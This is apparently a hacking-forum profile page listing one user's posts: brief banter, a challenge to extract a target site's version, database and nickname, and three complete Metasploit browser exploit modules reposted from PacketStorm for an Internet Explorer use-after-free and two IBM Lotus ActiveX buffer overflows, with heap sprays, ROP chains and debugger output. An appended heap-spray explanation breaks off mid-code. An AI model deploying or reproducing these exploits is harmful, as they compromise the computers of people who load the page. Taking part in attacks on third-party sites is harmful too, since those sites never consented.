Praetorian503 (Active Members; Posts: 578; Days Won: 5)

Everything posted by Praetorian503

  1. You have a PM.
  2. Target: ::Clothing Factory:: Requirements: version, database and nickname. Method: any. Post a screenshot.
     Solvers: Roby4kill, florin_darck, afumat, shaggi, StoNe-, 1000DotS, boogy, pedala1, XoddX
  3. Probably because of that.
  4. We are the bad guys, so you have it.
  5. So you came to spy on us. ON: Welcome.
  6. Some will conclude that what you are doing is fine, but you use illiterate language, characteristic of your age and of a certified cocalar. Nevertheless, welcome.
  7. Welcome to hacking here.
  8. The one with the 4S may be the one who defaced rstcenter.com.ro himself.
  9. Happy New Year to everyone! 'Successes'
  10. This Metasploit module exploits a vulnerability found in Microsoft Internet Explorer. A use-after-free condition occurs when a CButton object is freed but a reference to it is kept and used again during a page reload; the stale, attacker-controllable memory is then dereferenced, which allows arbitrary code execution in the context of the current user. Note: this vulnerability has been exploited in the wild, mainly against China-, Taiwan- and US-based computers.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb

  def initialize(info={})
    super(update_info(info,
      'Name'           => "Microsoft Internet Explorer CDwnBindInfo Object Use-After-Free Vulnerability",
      'Description'    => %q{
          This module exploits a vulnerability found in Microsoft Internet Explorer.
        A use-after-free condition occurs when a CButton object is freed, but a
        reference is kept and used again during a page reload, an invalid memory
        that's controllable is used, and allows arbitrary code execution under the
        context of the user.

        Please note: This vulnerability has been exploited in the wild targeting
        mainly China/Taiwan/and US-based computers.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'eromang',
          'mahmud ab rahman',
          'juan vazquez',
          'sinn3r'  #Metasploit
        ],
      'References'     =>
        [
          [ 'CVE', '2012-4792' ],
          [ 'US-CERT-VU', '154201' ],
          [ 'BID', '57070' ],
          [ 'URL', 'http://blog.fireeye.com/research/2012/12/council-foreign-relations-water-hole-attack-details.html'],
          [ 'URL', 'http://eromang.zataz.com/2012/12/29/attack-and-ie-0day-informations-used-against-council-on-foreign-relations/'],
          [ 'URL', 'http://blog.vulnhunt.com/index.php/2012/12/29/new-ie-0day-coming-mshtmlcdwnbindinfo-object-use-after-free-vulnerability/' ],
          [ 'URL', 'http://technet.microsoft.com/en-us/security/advisory/2794220' ],
          [ 'URL', 'http://blogs.technet.com/b/srd/archive/2012/12/29/new-vulnerability-affecting-internet-explorer-8-users.aspx' ]
        ],
      'Payload'        =>
        {
          'Space'           => 980,
          'DisableNops'     => true,
          'PrependEncoder'  => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          [ 'Automatic', {} ],
          [ 'IE 8 on Windows XP SP3',       { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
          [ 'IE 8 on Windows Vista',        { 'Rop' => :jre,    'Offset' => '0x586' } ], # 0x0c0c0b30
          [ 'IE 8 on Windows Server 2003',  { 'Rop' => :msvcrt, 'Offset' => '0x586' } ], # 0x0c0c0b30
          [ 'IE 8 on Windows 7',            { 'Rop' => :jre,    'Offset' => '0x586' } ]  # 0x0c0c0b30
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Dec 27 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
  end

  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    when '5.2'
      os_name = 'Windows Server 2003'
    when '6.0'
      os_name = 'Windows Vista'
    when '6.1'
      os_name = 'Windows 7'
    else
      # OS not supported
      return nil
    end

    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end

    return nil
  end

  def ie_heap_spray(my_target, p)
    js_code = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops = Rex::Text.to_unescape(Rex::Text.rand_text_alpha(4), Rex::Arch.endian(target.arch))

    # Land the payload at 0x0c0c0b30
    js = %Q|
    var heap_obj = new heapLib.ie(0x20000);
    var code = unescape("#{js_code}");
    var nops = unescape("#{js_nops}");
    while (nops.length < 0x80000) nops += nops;
    var offset = nops.substring(0, #{my_target['Offset']});
    var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
    while (shellcode.length < 0x40000) shellcode += shellcode;
    var block = shellcode.substring(0, (0x80000-6)/2);
    heap_obj.gc();
    for (var i=1; i < 0x300; i++) {
      heap_obj.alloc(block);
    }
    |

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end

    return js
  end

  def get_payload(t, cli)
    code = payload.encoded

    # No rop. Just return the payload.
    return code if t['Rop'].nil?

=begin
Stack Pivoting to eax:
0:008> db eax
0c0c0b30  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
0c0c0b40  0c 0c 0c 0c 0c 0c 0c 0c-0c 0c 0c 0c 0c 0c 0c 0c  ................
=end

    # Both ROP chains generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
      if t.name =~ /Windows XP/
        stack_pivot = [0x77c15ed6].pack("V") * 54 # ret
        stack_pivot << [0x77c2362c].pack("V")     # pop ebx, #ret
        stack_pivot << [0x77c15ed5].pack("V")     # xchg eax,esp # ret # 0x0c0c0c0c
        rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'xp'})
      else
        stack_pivot = [0x77bcba5f].pack("V") * 54 # ret
        stack_pivot << [0x77bb4158].pack("V")     # pop ebx, #ret
        stack_pivot << [0x77bcba5e].pack("V")     # xchg eax,esp # ret # 0x0c0c0c0c
        rop_payload = generate_rop_payload('msvcrt', code, {'pivot'=>stack_pivot, 'target'=>'2003'})
      end
    else
      print_status("Using JRE ROP")
      stack_pivot = [0x7c348b06].pack("V") * 54 # ret
      stack_pivot << [0x7c341748].pack("V")     # pop ebx, #ret
      stack_pivot << [0x7c348b05].pack("V")     # xchg eax,esp # ret # 0x0c0c0c0c
      rop_payload = generate_rop_payload('java', code, {'pivot'=>stack_pivot})
    end

    return rop_payload
  end

  def load_exploit_html(my_target, cli)
    p  = get_payload(my_target, cli)
    js = ie_heap_spray(my_target, p)

    html = %Q|
    <!doctype html>
    <html>
    <head>
    <script>
    #{js}
    function exploit() {
      var e0 = null;
      var e1 = null;
      var e2 = null;
      var arrObject = new Array(3000);
      var elmObject = new Array(500);
      for (var i = 0; i < arrObject.length; i++) {
        arrObject[i] = document.createElement('div');
        arrObject[i].className = unescape("ababababababababababababababababababababa");
      }
      for (var i = 0; i < arrObject.length; i += 2) {
        arrObject[i].className = null;
      }
      CollectGarbage();
      for (var i = 0; i < elmObject.length; i ++) {
        elmObject[i] = document.createElement('button');
      }
      for (var i = 1; i < arrObject.length; i += 2) {
        arrObject[i].className = null;
      }
      CollectGarbage();
      try {
        e0 = document.getElementById("a");
        e1 = document.getElementById("b");
        e2 = document.createElement("q");
        e1.applyElement(e2);
        e1.appendChild(document.createElement('button'));
        e1.applyElement(e0);
        e2.outerText = "";
        e2.appendChild(document.createElement('body'));
      } catch(e) { }
      CollectGarbage();
      for(var i =0; i < 20; i++) {
        arrObject[i].className = unescape("ababababababababababababababababababababa");
      }
      var eip = window;
      var data = "#{Rex::Text.rand_text_alpha(41)}";
      eip.location = unescape("%u0b30%u0c0c" + data);
    }
    </script>
    </head>
    <body onload="eval(exploit())">
    <form id="a">
    </form>
    <dfn id="b">
    </dfn>
    </body>
    </html>
    |

    return html
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")

    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    html = load_exploit_html(my_target, cli)
    html = html.gsub(/^\t\t/, '')
    print_status("Sending HTML...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

end

=begin
(87c.f40): Access violation - code c0000005 (first chance)
First chance exceptions are reported before any exception handling.
This exception may be expected and handled.
eax=12120d0c ebx=0023c218 ecx=00000052 edx=00000000 esi=00000000 edi=0301e400
eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0         nv up ei pl nz na pe nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010206
mshtml!CMarkup::OnLoadStatusDone+0x504:
637848c3 ff90dc000000    call    dword ptr <Unloaded_Ed20.dll>+0xdb (000000dc)[eax] ds:0023:12120de8=????????

0:008> k
ChildEBP RetAddr
020bf8a4 635c378b mshtml!CMarkup::OnLoadStatusDone+0x504
020bf8c4 635c3e16 mshtml!CMarkup::OnLoadStatus+0x47
020bfd10 636553f8 mshtml!CProgSink::DoUpdate+0x52f
020bfd24 6364de62 mshtml!CProgSink::OnMethodCall+0x12
020bfd58 6363c3c5 mshtml!GlobalWndOnMethodCall+0xfb
020bfd78 7e418734 mshtml!GlobalWndProc+0x183
020bfda4 7e418816 USER32!InternalCallWinProc+0x28
020bfe0c 7e4189cd USER32!UserCallWinProcCheckWow+0x150
020bfe6c 7e418a10 USER32!DispatchMessageWorker+0x306
020bfe7c 01252ec9 USER32!DispatchMessageW+0xf
020bfeec 011f48bf IEFRAME!CTabWindow::_TabWindowThreadProc+0x461
020bffa4 5de05a60 IEFRAME!LCIETab_ThreadProc+0x2c1
020bffb4 7c80b713 iertutil!CIsoScope::RegisterThread+0xab
020bffec 00000000 kernel32!BaseThreadStart+0x37

0:008> r
eax=0c0c0c0c ebx=0023c1d0 ecx=00000052 edx=00000000 esi=00000000 edi=033e9120
eip=637848c3 esp=020bf834 ebp=020bf8a4 iopl=0         nv up ei pl nz na po nc
cs=001b  ss=0023  ds=0023  es=0023  fs=003b  gs=0000             efl=00010202
mshtml!CMarkup::OnLoadStatusDone+0x504:
637848c3 ff90dc000000    call    dword ptr [eax+0DCh]  ds:0023:0c0c0ce8=????????
=end

Source: PacketStorm
  11. This Metasploit module exploits a buffer overflow in the UploadControl ActiveX. The vulnerability is in the handling of the "Attachment_Times" property, due to insecure use of _swscanf. The affected ActiveX is provided by qp2.dll, installed with the IBM Lotus Quickr product. The module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7 with qp2.dll 8.1.0.1800. To bypass ASLR it uses msvcr71.dll, a module that is not ASLR-compatible and is installed together with the qp2 ActiveX.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "6.0",
    :ua_maxver  => "9.0",
    :javascript => true,
    :os_name    => OperatingSystems::WINDOWS,
    :rank       => Rank,
    :classid    => "{05D96F71-87C6-11D3-9BE4-00902742D6E0}",
    :method     => "Attachment_Times"
  })

  def initialize(info={})
    super(update_info(info,
      'Name'           => "IBM Lotus QuickR qp2 ActiveX Buffer Overflow",
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability on the UploadControl
        ActiveX. The vulnerability exists in the handling of the "Attachment_Times"
        property, due to the insecure usage of the _swscanf. The affected ActiveX is
        provided by the qp2.dll installed with the IBM Lotus Quickr product. This
        module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7,
        using the qp2.dll 8.1.0.1800. In order to bypass ASLR the no aslr compatible
        module msvcr71.dll is used. This one is installed with the qp2 ActiveX.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gaurav Baruah', # Vulnerability discovery
          'juan vazquez'   # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-2176' ],
          [ 'OSVDB', '82166' ],
          [ 'BID', '53678'],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-134/' ],
          [ 'URL', 'http://www-01.ibm.com/support/docview.wss?uid=swg21596191' ]
        ],
      'Payload'        =>
        {
          'Space'           => 978,
          'DisableNops'     => true,
          'PrependEncoder'  => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # qp2.dll 8.1.0.1800
          [ 'Automatic', {} ],
          [ 'IE 6 on Windows XP SP3', { 'Rop' => nil,  'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ],
          [ 'IE 7 on Windows XP SP3', { 'Rop' => nil,  'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll
          [ 'IE 7 on Windows Vista',  { 'Rop' => nil,  'Offset' => '0x5f4', 'Ret' => 0x0c0c0c0c } ],
          [ 'IE 8 on Windows Vista',  { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll
          [ 'IE 8 on Windows 7',      { 'Rop' => :jre, 'Offset' => '0x5f4', 'Ret' => 0x7C346B52 } ], # pop esp # ret # msvcr71.dll
          [ 'IE 9 on Windows 7',      { 'Rop' => :jre, 'Offset' => '0x5fe', 'Ret' => 0x7C346B52 } ]  # pop esp # ret # msvcr71.dll
        ],
      'Privileged'     => false,
      'DisclosureDate' => "May 23 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
  end

  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    when '6.0'
      os_name = 'Windows Vista'
    when '6.1'
      os_name = 'Windows 7'
    end

    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end

    return nil
  end

  def ie_heap_spray(my_target, p)
    js_code        = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops        = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
    js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))

    # Land the payload at 0x0c0c0c0c
    case my_target
    when targets[7] # IE 9 on Windows 7
      js = %Q|
      function randomblock(blocksize)
      {
        var theblock = "";
        for (var i = 0; i < blocksize; i++)
        {
          theblock += Math.floor(Math.random()*90)+10;
        }
        return theblock;
      }

      function tounescape(block)
      {
        var blocklen = block.length;
        var unescapestr = "";
        for (var i = 0; i < blocklen-1; i=i+4)
        {
          unescapestr += "%u" + block.substring(i,i+4);
        }
        return unescapestr;
      }

      var heap_obj = new heapLib.ie(0x10000);
      var code = unescape("#{js_code}");
      var nops = unescape("#{js_random_nops}");
      while (nops.length < 0x80000) nops += nops;
      var offset_length = #{my_target['Offset']};
      for (var i=0; i < 0x1000; i++) {
        var padding = unescape(tounescape(randomblock(0x1000)));
        while (padding.length < 0x1000) padding+= padding;
        var junk_offset = padding.substring(0, offset_length);
        var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
        while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
        sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
        heap_obj.alloc(sprayblock);
      }
      |
    else # For IE 6, 7, 8
      js = %Q|
      var heap_obj = new heapLib.ie(0x20000);
      var code = unescape("#{js_code}");
      var nops = unescape("#{js_nops}");
      while (nops.length < 0x80000) nops += nops;
      var offset = nops.substring(0, #{my_target['Offset']});
      var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
      while (shellcode.length < 0x40000) shellcode += shellcode;
      var block = shellcode.substring(0, (0x80000-6)/2);
      heap_obj.gc();
      for (var i=1; i < 0x300; i++) {
        heap_obj.alloc(block);
      }
      var overflow = nops.substring(0, 10);
      |
    end

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end

    return js
  end

  def get_payload(t, cli)
    code = payload.encoded

    # No rop. Just return the payload.
    return code if t['Rop'].nil?

    # Both ROP chains generated by mona.py - See corelan.be
    case t['Rop']
    when :jre
      print_status("Using JRE ROP")
      rop_payload = generate_rop_payload('java', code)#, {'pivot'=>stack_pivot})
    end

    return rop_payload
  end

  def load_exploit_html(my_target, cli)
    p  = get_payload(my_target, cli)
    js = ie_heap_spray(my_target, p)

    bof = rand_text_alpha(512) # offset to eip
    bof << [my_target.ret].pack("V")
    if my_target['Rop']
      bof << rand_text_alpha(4)
      bof << [0x0c0c0c0c].pack("V") # new stack
    end

    my_bof = Rex::Text.to_unescape(bof)

    html = %Q|
    <html>
    <head>
    <script>
    #{js}
    </script>
    </head>
    <body>
    <object id="UploadControl" width="100%" height="100%" classid="clsid:05D96F71-87C6-11D3-9BE4-00902742D6E0">
    <param name="General_Mode" value="1">
    <param name="General_URL" value="http://#{rand_text_alpha(rand(10) + 5)}">
    </object>
    <script>
    var bof = unescape("#{my_bof}");
    var my_time = "#{rand_text_numeric(2)}/#{rand_text_numeric(2)}/#{rand_text_numeric(4)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)} ";
    my_time += bof;
    my_time += " GMT";
    UploadControl.Attachment_Times = my_time;
    </script>
    </body>
    </html>
    |

    return html
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")

    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    html = load_exploit_html(my_target, cli)
    html = html.gsub(/^\t\t/, '')
    print_status("Sending HTML...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

end

Source: PacketStorm
  12. This Metasploit module exploits a buffer overflow in the UploadControl ActiveX. The vulnerability is in the handling of the "Attachment_Times" property, due to insecure use of _swscanf. The affected ActiveX is provided by dwa85W.dll, installed by the IBM Lotus iNotes ActiveX installer. The module has been tested successfully on IE6-IE9 on Windows XP, Vista and 7 with dwa85W.dll 85.3.3.0 as installed with Lotus Domino 8.5.3. To bypass ASLR it uses dwabho.dll, a module that is not ASLR-compatible and is installed together with the iNotes ActiveX.

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = NormalRanking

  include Msf::Exploit::Remote::HttpServer::HTML
  include Msf::Exploit::RopDb
  include Msf::Exploit::Remote::BrowserAutopwn

  autopwn_info({
    :ua_name    => HttpClients::IE,
    :ua_minver  => "6.0",
    :ua_maxver  => "9.0",
    :javascript => true,
    :os_name    => OperatingSystems::WINDOWS,
    :rank       => Rank,
    :classid    => "{0F2AAAE3-7E9E-4b64-AB5D-1CA24C6ACB9C}",
    :method     => "Attachment_Times"
  })

  def initialize(info={})
    super(update_info(info,
      'Name'           => "IBM Lotus iNotes dwa85W ActiveX Buffer Overflow",
      'Description'    => %q{
          This module exploits a buffer overflow vulnerability on the UploadControl
        ActiveX. The vulnerability exists in the handling of the "Attachment_Times"
        property, due to the insecure usage of the _swscanf. The affected ActiveX is
        provided by the dwa85W.dll installed with the IBM Lotus iNotes ActiveX
        installer. This module has been tested successfully on IE6-IE9 on Windows XP,
        Vista and 7, using the dwa85W.dll 85.3.3.0 as installed with Lotus Domino
        8.5.3. In order to bypass ASLR the no aslr compatible module dwabho.dll is
        used. This one is installed with the iNotes ActiveX.
      },
      'License'        => MSF_LICENSE,
      'Author'         =>
        [
          'Gaurav Baruah', # Vulnerability discovery
          'juan vazquez'   # Metasploit module
        ],
      'References'     =>
        [
          [ 'CVE', '2012-2175'],
          [ 'OSVDB', '82755' ],
          [ 'BID', '53879' ],
          [ 'URL', 'http://www.zerodayinitiative.com/advisories/ZDI-12-132/' ],
          [ 'URL', 'http://www-304.ibm.com/support/docview.wss?uid=swg21596862' ]
        ],
      'Payload'        =>
        {
          'Space'           => 978,
          'DisableNops'     => true,
          'PrependEncoder'  => "\x81\xc4\x54\xf2\xff\xff" # Stack adjustment # add esp, -3500
        },
      'DefaultOptions'  =>
        {
          'InitialAutoRunScript' => 'migrate -f'
        },
      'Platform'       => 'win',
      'Targets'        =>
        [
          # dwa85W.dll 85.3.3.0
          [ 'Automatic', {} ],
          [ 'IE 6 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ],
          [ 'IE 7 on Windows XP SP3', { 'Rop' => nil,     'Offset' => '0x5F4', 'Ret' => 0x0c0c0c0c } ],
          [ 'IE 8 on Windows XP SP3', { 'Rop' => :msvcrt, 'Offset' => '0x5f4', 'Ret' => 0x77C34FBF } ], # pop esp # ret # msvcrt.dll
          [ 'IE 7 on Windows Vista',  { 'Rop' => nil,     'Offset' => '0x5f4', 'Ret' => 0x0c0c0c0c } ],
          [ 'IE 8 on Windows Vista',  { 'Rop' => :notes,  'Offset' => '0x5f4', 'Ret' => 0x1000f765 } ], # pop eax # ret # dwabho.dll
          [ 'IE 8 on Windows 7',      { 'Rop' => :notes,  'Offset' => '0x5f4', 'Ret' => 0x1000f765 } ], # pop eax # ret # dwabho.dll
          [ 'IE 9 on Windows 7',      { 'Rop' => :notes,  'Offset' => '0x5fe', 'Ret' => 0x1000f765 } ]  # pop eax # ret # dwabho.dll
        ],
      'Privileged'     => false,
      'DisclosureDate' => "Jun 01 2012",
      'DefaultTarget'  => 0))

    register_options(
      [
        OptBool.new('OBFUSCATE', [false, 'Enable JavaScript obfuscation', false])
      ], self.class)
  end

  def get_target(agent)
    #If the user is already specified by the user, we'll just use that
    return target if target.name != 'Automatic'

    nt = agent.scan(/Windows NT (\d\.\d)/).flatten[0] || ''
    ie = agent.scan(/MSIE (\d)/).flatten[0] || ''

    ie_name = "IE #{ie}"

    case nt
    when '5.1'
      os_name = 'Windows XP SP3'
    when '6.0'
      os_name = 'Windows Vista'
    when '6.1'
      os_name = 'Windows 7'
    end

    targets.each do |t|
      if (!ie.empty? and t.name.include?(ie_name)) and (!nt.empty? and t.name.include?(os_name))
        print_status("Target selected as: #{t.name}")
        return t
      end
    end

    return nil
  end

  def ie_heap_spray(my_target, p)
    js_code        = Rex::Text.to_unescape(p, Rex::Arch.endian(target.arch))
    js_nops        = Rex::Text.to_unescape("\x0c"*4, Rex::Arch.endian(target.arch))
    js_random_nops = Rex::Text.to_unescape(make_nops(4), Rex::Arch.endian(my_target.arch))

    # Land the payload at 0x0c0c0c0c
    case my_target
    when targets[7] # IE 9 on Windows 7
      js = %Q|
      function randomblock(blocksize)
      {
        var theblock = "";
        for (var i = 0; i < blocksize; i++)
        {
          theblock += Math.floor(Math.random()*90)+10;
        }
        return theblock;
      }

      function tounescape(block)
      {
        var blocklen = block.length;
        var unescapestr = "";
        for (var i = 0; i < blocklen-1; i=i+4)
        {
          unescapestr += "%u" + block.substring(i,i+4);
        }
        return unescapestr;
      }

      var heap_obj = new heapLib.ie(0x10000);
      var code = unescape("#{js_code}");
      var nops = unescape("#{js_random_nops}");
      while (nops.length < 0x80000) nops += nops;
      var offset_length = #{my_target['Offset']};
      for (var i=0; i < 0x1000; i++) {
        var padding = unescape(tounescape(randomblock(0x1000)));
        while (padding.length < 0x1000) padding+= padding;
        var junk_offset = padding.substring(0, offset_length);
        var single_sprayblock = junk_offset + code + nops.substring(0, 0x800 - code.length - junk_offset.length);
        while (single_sprayblock.length < 0x20000) single_sprayblock += single_sprayblock;
        sprayblock = single_sprayblock.substring(0, (0x40000-6)/2);
        heap_obj.alloc(sprayblock);
      }
      |
    else # For IE 6, 7, 8
      js = %Q|
      var heap_obj = new heapLib.ie(0x20000);
      var code = unescape("#{js_code}");
      var nops = unescape("#{js_nops}");
      while (nops.length < 0x80000) nops += nops;
      var offset = nops.substring(0, #{my_target['Offset']});
      var shellcode = offset + code + nops.substring(0, 0x800-code.length-offset.length);
      while (shellcode.length < 0x40000) shellcode += shellcode;
      var block = shellcode.substring(0, (0x80000-6)/2);
      heap_obj.gc();
      for (var i=1; i < 0x300; i++) {
        heap_obj.alloc(block);
      }
      var overflow = nops.substring(0, 10);
      |
    end

    js = heaplib(js, {:noobfu => true})

    if datastore['OBFUSCATE']
      js = ::Rex::Exploitation::JSObfu.new(js)
      js.obfuscate
    end

    return js
  end

  def get_payload(t, cli)
    code = payload.encoded

    # No rop. Just return the payload.
    return code if t['Rop'].nil?

    # Both ROP chains generated by mona.py - See corelan.be
    case t['Rop']
    when :msvcrt
      print_status("Using msvcrt ROP")
      rop_payload = generate_rop_payload('msvcrt', code, {'target'=>'xp'})#{'pivot'=>stack_pivot, 'target'=>'xp'})
    else
      print_status("Using dwabho.dll ROP")
      # gadgets from dwabho.dll, using mona.py
      rop_payload = [
        0x1000f765, # POP EAX # RETN
        0x1001a22c, # ptr to &VirtualAlloc() [IAT dwabho.dll]
        0x10010394, # JMP DWORD PTR DS:[EAX]
        0x0c0c0c2c, # ret after VirtualAlloc
        0x0c0c0c2c, # lpAddress
        0x00000400, # dwSize
        0x00001000, # flAllocationType
        0x00000040  # flProtect
      ].pack("V*")
      rop_payload << code
    end

    return rop_payload
  end

  def load_exploit_html(my_target, cli)
    p  = get_payload(my_target, cli)
    js = ie_heap_spray(my_target, p)

    bof = rand_text_alpha(552) # offset to eip
    bof << [my_target.ret].pack("V")
    case my_target['Rop']
    when :msvcrt
      bof << rand_text_alpha(4)
      bof << [0x0c0c0c0c].pack("V") # new ESP
    when :notes
      bof << rand_text_alpha(4)
      bof << [0x0c0c0c00].pack("V") # eax
      bof << [0x1000f49a].pack("V") # pop esp # dec ecx # add byte ptr ds:[eax],al # pop ecx # pop ecx # retn # dwabho.dll
      bof << [0x0c0c0c04].pack("V") # new ESP
    end

    my_bof = Rex::Text.to_unescape(bof)

    html = %Q|
    <html>
    <head>
    <script>
    #{js}
    </script>
    </head>
    <body>
    <object id="UploadControl" width="100%" height="100%" classid="clsid:0F2AAAE3-7E9E-4b64-AB5D-1CA24C6ACB9C">
    <param name="General_Mode" value="1">
    <param name="General_URL" value="http://#{rand_text_alpha(rand(10) + 5)}">
    </object>
    <script>
    var bof = unescape("#{my_bof}");
    var my_time = "#{rand_text_numeric(2)}/#{rand_text_numeric(2)}/#{rand_text_numeric(4)} #{rand_text_numeric(2)}:#{rand_text_numeric(2)}:#{rand_text_numeric(2)} ";
    my_time += bof;
    my_time += " GMT";
    UploadControl.Attachment_Times = my_time;
    </script>
    </body>
    </html>
    |

    return html
  end

  def on_request_uri(cli, request)
    agent = request.headers['User-Agent']
    uri   = request.uri
    print_status("Requesting: #{uri}")

    my_target = get_target(agent)
    # Avoid the attack if no suitable target found
    if my_target.nil?
      print_error("Browser not supported, sending 404: #{agent}")
      send_not_found(cli)
      return
    end

    html = load_exploit_html(my_target, cli)
    html = html.gsub(/^\t\t/, '')
    print_status("Sending HTML...")
    send_response(cli, html, {'Content-Type'=>'text/html'})
  end

end

Source: PacketStorm
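The three IE heap sprays above (the CDwnBindInfo module and the two Lotus ActiveX modules) rely on the same layout arithmetic: one JavaScript string character is two bytes, each spray unit is 0x800 characters (0x1000 bytes), and the per-target 'Offset' fixes where the payload sits inside every 0x1000-byte period so that the chosen address (0x0c0c0b30 or 0x0c0c0c0c) lands on the first payload byte regardless of which copy of the block it falls into. The code below is an added example, not code from the modules or from Metasploit; it rebuilds a spray block with the modules' own substring logic and derives the offset from the target address. The 0x24-byte per-allocation header is an assumption inferred from the modules' constants (0x0b30 - 2*0x586 = 0x24 and 0xc0c - 2*0x5f4 = 0x24); the IE 9 target's 0x5fe implies a different header of 0x10 bytes, which the example also shows. Payload and filler strings are constructed placeholders.

```javascript
// Added example (not from Metasploit or the posted modules): the heap-spray layout
// arithmetic behind the per-target 'Offset' values in the IE modules above.
// One JavaScript character is two bytes, so an 0x800-character spray unit is 0x1000
// bytes and the payload recurs at the same 12-bit page offset in every unit.
const UNIT_CHARS  = 0x800;                // spray unit used by the modules (0x1000 bytes)
const BLOCK_CHARS = (0x80000 - 6) / 2;    // block length used by the IE 6/7/8 sprays

// ASSUMPTIONS (not stated on the page): bytes of allocation/BSTR header that precede
// the string data, inferred from the modules' own constants.
const HEADER_BYTES_IE8 = 0x24;            // 0x0b30 - 2*0x586 == 0x0c0c - 2*0x5f4 == 0x24
const HEADER_BYTES_IE9 = 0x10;            // 0x0c0c - 2*0x5fe == 0x10

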